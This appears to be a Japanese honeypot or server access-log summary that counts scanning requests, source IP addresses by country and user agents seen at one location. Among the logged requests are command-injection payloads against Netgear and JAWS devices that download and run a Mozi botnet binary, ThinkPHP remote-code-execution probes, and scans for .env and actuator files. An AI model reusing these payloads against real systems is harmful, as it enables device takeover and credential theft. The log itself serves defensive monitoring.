1	GET	/portal/redlion	HTTP/1.1
1	GET	/robots.txt	HTTP/1.1
2	GET	/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1	HTTP/1.0
1	GET	/shell?cd+/tmp;rm+-rf+*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.a;chmod+777+Mozi[.]a;/tmp/Mozi.a+jaws	HTTP/1.1
1	GET	/spec/api.json	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/ui	HTTP/1.1
1	GET	http[:]//azenv[.]net/	HTTP/1.1
3	HEAD	/	HTTP/1.0
1	HEAD	/actuator	HTTP/1.1
1	HEAD	/actuator/auditevents	HTTP/1.1
1	HEAD	/actuator/beans	HTTP/1.1
1	HEAD	/actuator/conditions	HTTP/1.1
1	HEAD	/actuator/configprops	HTTP/1.1
1	HEAD	/actuator/env	HTTP/1.1
1	HEAD	/actuator/health	HTTP/1.1
1	HEAD	/actuator/heapdump	HTTP/1.1
1	HEAD	/actuator/httptrace	HTTP/1.1
1	HEAD	/actuator/hystrix.stream	HTTP/1.1
1	HEAD	/actuator/info	HTTP/1.1
1	HEAD	/actuator/jolokia	HTTP/1.1
1	HEAD	/actuator/loggers	HTTP/1.1
1	HEAD	/actuator/mappings	HTTP/1.1
1	HEAD	/actuator/metrics	HTTP/1.1
1	HEAD	/actuator/scheduledtasks	HTTP/1.1
1	HEAD	/actuator/threaddump	HTTP/1.1
1	HEAD	/auditevents	HTTP/1.1
1	HEAD	/autoconfig	HTTP/1.1
1	HEAD	/beans	HTTP/1.1
1	HEAD	/cloudfoundryapplication	HTTP/1.1
1	HEAD	/configprops	HTTP/1.1
1	HEAD	/dump	HTTP/1.1
1	HEAD	/env	HTTP/1.1
1	HEAD	/health	HTTP/1.1
1	HEAD	/heapdump	HTTP/1.1
1	HEAD	/hystrix.stream	HTTP/1.1
1	HEAD	/info	HTTP/1.1
1	HEAD	/jolokia	HTTP/1.1
1	HEAD	/loggers	HTTP/1.1
1	HEAD	/mappings	HTTP/1.1
1	HEAD	/metrics	HTTP/1.1
1	HEAD	/threaddump	HTTP/1.1
1	HEAD	/trace	HTTP/1.1
11	OPTIONS	/	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
2	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/sdk	HTTP/1.1
3	PROPFIND	/	HTTP/1.1
1	TKNV	/	HTTP/1.1

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	34.96.130.18	United States
2	45.95.147.3	Netherlands
4	45.144.225.84	Netherlands
11	45.146.164.110	Russia
1	49.83.130.92	China
1	69.194.182.218	United States
1	121.99.216.105	New Zealand
7	134.209.191.60	United States
3	135.125.217.54	France
1	142.93.235.33	United States
1	162.62.117.51	Singapore
3	163.172.161.118	United Kingdom
13	175.169.212.27	China
1	185.53.90.24	Belize
1	192.241.217.246	United States
1	192.241.221.6	United States
1	199.249.230.120	United States
1	209.17.97.10	United States
2	209.141.43.209	United States
2	209.141.48.211	United States
10	222.77.181.28	China

UserAgent一覧

件数	UserAgent
8	-
1	AlexaMediaPlayer/2.1.4676.0 (Linux;Android 5.1.1) ExoPlayerLib/1.5.9
2	Go-http-client/1.1
2	Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36
5	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
11	Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
13	Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
9	Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)
9	Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36
4	Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0
1	Mozilla/5.0 (compatible; Baiduspider/2.0; +http[:]//www[.]baidu[.]com/search/spider.html)
2	Mozilla/5.0 zgrab/0.x
1	python-requests/2.18.4

リクエスト内容一覧

件数	Method	Request	Protocol
2		\x16\x03\x01
1	CONNECT	www[.]bing[.]com:443	HTTP/1.1
6	GET	/.env	HTTP/1.1
1	GET	/?XDEBUG_SESSION_START=phpstorm	HTTP/1.1
1	GET	/?a=fetch&content=die(@md5(HelloThinkCMF))	HTTP/1.1
1	GET	/HNAP1/	HTTP/1.1
1	GET	/SQLite/main.php	HTTP/1.1
1	GET	/SQLiteManager-1.2.4/main.php	HTTP/1.1
1	GET	/SQLiteManager/main.php	HTTP/1.1
1	GET	/SQlite/main.php	HTTP/1.1
1	GET	/TP/html/public/index.php	HTTP/1.1
1	GET	/TP/index.php	HTTP/1.1
1	GET	/TP/public/index.php	HTTP/1.1
2	GET	/_ignition/execute-solution	HTTP/1.1
1	GET	/actuator/health	HTTP/1.1
1	GET	/agSearch/SQlite/main.php	HTTP/1.1
1	GET	/app/.env	HTTP/1.1
1	GET	/c/version.js	HTTP/1.1
1	GET	/console/	HTTP/1.1
1	GET	/core/.env	HTTP/1.1
1	GET	/elrekt.php	HTTP/1.1
1	GET	/favicon.ico	HTTP/1.1
1	GET	/flu/403.html	HTTP/1.1
1	GET	/html/public/index.php	HTTP/1.1
1	GET	/hudson/script	HTTP/1.1
1	GET	/index.php	HTTP/1.1
1	GET	/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP21	HTTP/1.1
1	GET	/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1	HTTP/1.1
1	GET	/main.php	HTTP/1.1
1	GET	/portal/redlion	HTTP/1.1
1	GET	/public/.env	HTTP/1.1
1	GET	/public/index.php	HTTP/1.1
1	GET	/script	HTTP/1.1
1	GET	/solr/admin/info/system?wt=json	HTTP/1.1
1	GET	/sqlite/main.php	HTTP/1.1
1	GET	/sqlitemanager/main.php	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/stream/live.php	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php	HTTP/1.1
1	GET	/thinkphp/html/public/index.php	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	http[:]//azenv[.]net/	HTTP/1.1
1	GET	http[:]//www[.]bing[.]com/	HTTP/1.1
1	GET	http[:]//www[.]msftncsi[.]com/ncsi.txt	HTTP/1.1
1	HEAD	/	HTTP/1.0
2	HEAD	/robots.txt	HTTP/1.0
1	OPTIONS	/ RTSP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/HNAP1/	HTTP/1.0
1	POST	/api/jsonws/invoke	HTTP/1.1
4	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/index.php?s=captcha	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	POST	http[:]//lindsayvinson[.]site/474476735d51a6d5a10777fe81dbe871fe2e616c18c2dbaeb68e8f4de6b17db0a50af9f797d4f6f64d8c2b7679f0f2880a9e8f16e5da54ce8acfbfb6342fb7ca0b3c58187867655ff9f01418210887c354034d90479b229178a172c91ec6ad04	HTTP/1.1